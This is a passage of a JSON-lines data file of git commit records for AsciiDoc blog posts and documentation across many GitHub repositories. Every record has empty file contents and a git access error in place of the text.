2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa31daca87625ceff9891437d2f4af671769a1f5","subject":"Update 2018-01-28-Four-X-Four.adoc","message":"Update 2018-01-28-Four-X-Four.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-01-28-Four-X-Four.adoc","new_file":"_posts\/2018-01-28-Four-X-Four.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69b3752775e0a63f09375ee2bfb22d8446676340","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f98c55f1bdde6046093b0422b298b16000698d3b","subject":"Update 2019-01-06-G-A-S-Slack.adoc","message":"Update 2019-01-06-G-A-S-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6edeefa7c6d5696848988c5e8ca506a26727b9d4","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a978b0c1cd6c0220f6bdb9173521c4e516dba05","subject":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4aff4b702629984063dcb1a50a7c9084d7d7f0e8","subject":"Update 2018-04-14-Plugins-for-PostCSS-which-can-write-like-SCSS-style.adoc","message":"Update 2018-04-14-Plugins-for-PostCSS-which-can-write-like-SCSS-style.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2018-04-14-Plugins-for-PostCSS-which-can-write-like-SCSS-style.adoc","new_file":"_posts\/2018-04-14-Plugins-for-PostCSS-which-can-write-like-SCSS-style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c62db2db9a978305a0f1a044d7a80dd7478d97","subject":"Update 2017-09-18-Draft.adoc","message":"Update 2017-09-18-Draft.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-09-18-Draft.adoc","new_file":"_posts\/2017-09-18-Draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3b9183685ace05581b2e5410b76fa443deb4d03","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bab4b14d994993cb1378bb1d1198d20ab8206376","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 
2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b90fe4a23fcc63a051e7f4def18db9485ce1635","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae6415a460c38db9d53259db65263d3b266dcf5","subject":"added the file","message":"added the file\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios.asciidoc","new_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"736ec7eb26af47521dbd7684cc723cca44aefe60","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97c445bd51a73393c6ac3fcf64c1196715ab73d8","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18a84cadd9cd5cf7fe70155c3ea91702eb965196","subject":"Update 2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","message":"Update 
2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_file":"_posts\/2015-07-06-How-long-does-it-take-you-to-create-a-RevealJS-presentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gscheibel\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9c02836eaf170d3208c3a573c0abbe962d5f5b7","subject":"Update 2017-06-08-Using-virt-who-with-virtual-datacenter-subscriptions.adoc","message":"Update 2017-06-08-Using-virt-who-with-virtual-datacenter-subscriptions.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-08-Using-virt-who-with-virtual-datacenter-subscriptions.adoc","new_file":"_posts\/2017-06-08-Using-virt-who-with-virtual-datacenter-subscriptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54a9249992bda3321c751d568bbdbd29c1d805bf","subject":"Fixed typo in search for wrong type (#28645)","message":"Fixed typo in search for wrong type (#28645)\n\n","repos":"robin13\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/query-dsl\/terms-query.asciidoc","new_file":"docs\/reference\/query-dsl\/terms-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"708e792fc93b6e370cbe02703be202459fdb7075","subject":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","message":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33a5e63aabe0ecc04cbf1085ba1da539c941eee8","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c412dda76b0413740c265ae17a002f23cc3917","subject":"Adding release notes for release of coverage revapi_maven_plugin","message":"Adding release notes for release of coverage revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-re-release.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-re-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"be09d0b283fec838e26f64af5c551d0c6a1a5a05","subject":"Added Service Pool to docs","message":"Added Service Pool to 
docs\n","repos":"CodeSmell\/camel,alvinkwekel\/camel,tadayosi\/camel,gnodet\/camel,apache\/camel,davidkarlsen\/camel,gnodet\/camel,apache\/camel,punkhorn\/camel-upstream,tadayosi\/camel,apache\/camel,punkhorn\/camel-upstream,onders86\/camel,pax95\/camel,kevinearls\/camel,apache\/camel,pmoerenhout\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,kevinearls\/camel,nicolaferraro\/camel,onders86\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,zregvart\/camel,DariusX\/camel,pmoerenhout\/camel,pmoerenhout\/camel,CodeSmell\/camel,kevinearls\/camel,tdiesler\/camel,cunningt\/camel,onders86\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,apache\/camel,christophd\/camel,objectiser\/camel,davidkarlsen\/camel,CodeSmell\/camel,CodeSmell\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,nicolaferraro\/camel,tadayosi\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,objectiser\/camel,onders86\/camel,adessaigne\/camel,kevinearls\/camel,tadayosi\/camel,ullgren\/camel,davidkarlsen\/camel,tdiesler\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,zregvart\/camel,apache\/camel,mcollovati\/camel,cunningt\/camel,punkhorn\/camel-upstream,ullgren\/camel,zregvart\/camel,ullgren\/camel,cunningt\/camel,mcollovati\/camel,Fabryprog\/camel,pmoerenhout\/camel,Fabryprog\/camel,zregvart\/camel,tdiesler\/camel,pax95\/camel,objectiser\/camel,onders86\/camel,DariusX\/camel,tdiesler\/camel,davidkarlsen\/camel,christophd\/camel,cunningt\/camel,alvinkwekel\/camel,alvinkwekel\/camel,Fabryprog\/camel,pmoerenhout\/camel,kevinearls\/camel,christophd\/camel,DariusX\/camel,pmoerenhout\/camel,tdiesler\/camel,tdiesler\/camel,DariusX\/camel,nikhilvibhav\/camel,mcollovati\/camel,christophd\/camel,objectiser\/camel,Fabryprog\/camel,cunningt\/camel,ullgren\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,adessaigne\/camel,onders86\/camel,alvinkwekel\/camel,kevinearls\/camel","old_file":"docs\/user-manual\/en\/servicepool.adoc","new_file":"docs\/user-manual\/en\/servicepool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a04dfb4af6f53513d3bdad51751a7d07725af8e1","subject":"y2b create post iPhone 5c Unboxing (BLUE iPhone 5c Launch Day Unboxing)","message":"y2b create post iPhone 5c Unboxing (BLUE iPhone 5c Launch Day Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5c-Unboxing-BLUE-iPhone-5c-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-09-20-iPhone-5c-Unboxing-BLUE-iPhone-5c-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80278e9c7937d5323598158401937aca83d3bdf9","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 
2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1f6519b03b8a4fc4765c7d936e9806fcc3176cf","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40897898371b994599392a7ad4366edd06825971","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"jughyd\/MVCBookStore,rohitvvv\/MVCBookStore,jughyd\/MVCBookStore,rajmahendra\/MVCBookStore,rajmahendra\/MVCBookStore,jughyd\/MVCBookStore,jbuddha\/MVCBookStore,jbuddha\/MVCBookStore,rohitvvv\/MVCBookStore,jbuddha\/MVCBookStore,rajmahendra\/MVCBookStore,rohitvvv\/MVCBookStore","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohitvvv\/MVCBookStore.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"680514a3eefdd9d6518921f430f41e7f92876ede","subject":"Update 2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","message":"Update 2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","new_file":"_posts\/2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee62768d9412a69cc9b077919030b4bf525b291a","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9401feb077e11080b9723d2c27b7207548fd08f4","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 
2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e95f3865d197831c3fa72a18b840b2327fa3076","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22ced1464d42aa22eb229ea96d8c35ea4498582b","subject":"up website","message":"up website\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4075ee99869259082fe7ae167420a22f2a0f540b","subject":"Update 2015-02-24-change-2.adoc","message":"Update 2015-02-24-change-2.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-2.adoc","new_file":"_posts\/2015-02-24-change-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b31d5a835d62f88d47d183918dc114a6d8350","subject":"Update 2015-12-11-HubPress.adoc","message":"Update 2015-12-11-HubPress.adoc","repos":"saiisai\/saiisai.github.io,saiisai\/saiisai.github.io,saiisai\/saiisai.github.io","old_file":"_posts\/2015-12-11-HubPress.adoc","new_file":"_posts\/2015-12-11-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/saiisai\/saiisai.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4b305f12eb9bfc0abcc70d2c072b5e5dbb8b8b6","subject":"Update 2015-11-25-Markdown.adoc","message":"Update 2015-11-25-Markdown.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-11-25-Markdown.adoc","new_file":"_posts\/2015-11-25-Markdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b06b5f80ae9da0c3c6b7e82a3efa64c21b4744a","subject":"Update 2015-11-26-AsciiDoc.adoc","message":"Update 2015-11-26-AsciiDoc.adoc","repos":"jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io","old_file":"_posts\/2015-11-26-AsciiDoc.adoc","new_file":"_posts\/2015-11-26-AsciiDoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jakkypan\/jakkypan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cadaf104b9edd16445723d3524094b8a83c8c0b","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"560c8f68b256c3a2556c846ec21c2a2b67a5e2a0","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e712ecbb9f7db35bda166777a153ab8643efd72e","subject":"y2b create post Belkin AV360 Mini DisplayPort Converter Unboxing \\u0026 Overview","message":"y2b create post Belkin AV360 Mini DisplayPort Converter Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-14-Belkin-AV360-Mini-DisplayPort-Converter-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-14-Belkin-AV360-Mini-DisplayPort-Converter-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66c5a6fe9d629b7643ed1ca87c52070a5ecd0d97","subject":"Update 2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","message":"Update 
